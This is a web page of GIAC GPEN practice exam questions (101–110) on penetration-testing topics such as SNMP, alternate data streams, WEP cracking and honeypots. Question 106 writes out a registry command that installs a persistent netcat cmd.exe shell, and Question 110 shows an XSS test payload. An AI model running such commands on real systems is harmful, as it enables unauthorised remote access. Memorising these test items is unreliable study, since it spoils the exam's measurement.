Summer Special 60% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: bestdeal

Free GIAC GPEN Practice Exam with Questions & Answers | Set: 11

Questions 101

Adam is a novice Internet user. He is using Google search engine to search documents of his interest. Adam wants to search the text present in the link of a Website. Which of the following operators will he use in his query to accomplish the task?

Options:
A.

inanchor

B.

info

C.

link

D.

site

GIAC GPEN Premium Access
Questions 102

You work as a Penetration Tester for the Infosec Inc. Your company takes the projects of security auditing. Recently, your company has assigned you a project to test the security of the we-aresecure. com network. Now, when you have finished your penetration testing, you find that the weare- secure.com server is highly vulnerable to SNMP enumeration. You advise the we-are-secure Inc. to turn off SNMP; however, this is not possible as the company is using various SNMP services on its remote nodes. What other step can you suggest to remove SNMP vulnerability?

Each correct answer represents a complete solution. Choose two.

Options:
A.

Close port TCP 53.

B.

Change the default community string names.

C.

Upgrade SNMP Version 1 with the latest version.

D.

Install antivirus.

Questions 103

Adam, a malicious hacker, hides a hacking tool from a system administrator of his company by using Alternate Data Streams (ADS) feature. Which of the following statements is true in context with the above scenario?

Options:
A.

Alternate Data Streams is a feature of Linux operating system.

B.

Adam's system runs on Microsoft Windows 98 operating system.

C.

Adam is using FAT file system.

D.

Adam is using NTFS file system.

Questions 104

Which of the following methods can be used to detect session hijacking attack?

Options:
A.

ntop

B.

Brutus

C.

nmap

D.

sniffer

Questions 105

John works as a Professional Ethical Hacker for we-are-secure Inc. The company is using a Wireless network. John has been assigned the work to check the security of WLAN of we-aresecure.

For this, he tries to capture the traffic, however, he does not find a good traffic to analyze data. He has already discovered the network using the ettercap tool. Which of the following tools can he use to generate traffic so that he can crack the Wep keys and enter into the network?

Options:
A.

ICMP ping flood tool

B.

Kismet

C.

Netstumbler

D.

AirSnort

Questions 106

You run the following command on the remote Windows server 2003 computer:

c:\reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t

REG_SZ /d "c:\windows\nc.exe -d 192.168.1.7 4444 -e cmd.exe"

What task do you want to perform by running this command?

Each correct answer represents a complete solution. Choose all that apply.

Options:
A.

You want to put Netcat in the stealth mode.

B.

You want to add the Netcat command to the Windows registry.

C.

You want to perform banner grabbing.

D.

You want to set the Netcat to execute command any time.

Questions 107

Which of the following tools can be used to enumerate networks that have blocked ICMP Echo packets, however, failed to block timestamp or information packet or not performing sniffing of trusted addresses, and it also supports spoofing and promiscuous listening for reply packets?

Options:
A.

Nmap

B.

Zenmap

C.

Icmpenum

D.

Nessus

Questions 108

Which of the following is generally practiced by the police or any other recognized governmental authority?

Options:
A.

Spoofing

B.

Wiretapping

C.

Phishing

D.

SMB signing

Questions 109

You work as a Penetration Tester for the Infosec Inc. Your company takes the projects of security auditing. Recently, your company has assigned you a project to test the security of the we-aresecure. com Website. The we-are-secure.com Web server is using Linux operating system. When you port scanned the we-are-secure.com Web server, you got that TCP port 23, 25, and 53 are open. When you tried to telnet to port 23, you got a blank screen in response. When you tried to type the dir, copy, date, del, etc. commands you got only blank spaces or underscores symbols on the screen. What may be the reason of such unwanted situation?

Options:
A.

The we-are-secure.com server is using honeypot.

B.

The telnet session is being affected by the stateful inspection firewall.

C.

The telnet service of we-are-secure.com has corrupted.

D.

The we-are-secure.com server is using a TCP wrapper.

Questions 110

John works as a Penetration Tester in a security service providing firm named you-are-secure Inc.

Recently, John's company has got a project to test the security of a promotional Website

www.missatlanta.com and assigned the pen-testing work to John. When John is performing penetration testing, he inserts the following script in the search box at the company home page:

<script>alert('Hi, John')</script>

After pressing the search button, a pop-up box appears on his screen with the text - "Hi, John."

Which of the following attacks can be performed on the Web site tested by john while considering the above scenario?

Options:
A.

XSS attack

B.

Replay attack

C.

Buffer overflow attack

D.

CSRF attack